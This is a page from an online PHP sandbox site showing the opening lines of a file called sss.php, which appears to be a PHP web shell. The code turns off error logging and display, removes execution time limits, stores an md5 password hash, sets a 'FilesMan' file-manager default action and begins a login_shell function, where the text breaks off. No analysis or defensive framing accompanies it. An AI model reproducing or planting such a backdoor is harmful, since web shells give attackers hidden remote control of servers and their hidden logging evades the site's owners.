sss - PHP Online
Form of PHP Sandbox
Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php
in the places where the PHP script should be executed.
Result of php executing
Full code of sss.php
- <?php
- session_start();
- @set_time_limit(0);
- @clearstatcache();
- @ini_set('error_log', NULL);
- @ini_set('log_errors', 0);
- @ini_set('max_execution_time', 0);
- @ini_set('output_buffering', 0);
- @ini_set('display_errors', 0);
- /* konfigurasi */
- /* Password using md5 hashes */
- $password = "2ecdf565d44933226cc6709c761c0acd";
- $default_action = "FilesMan";
- $default_use_ajax = true;
- $default_charset = 'UTF-8';
- date_default_timezone_set("Asia/Jakarta");
- function login_shell()
- {
- ?>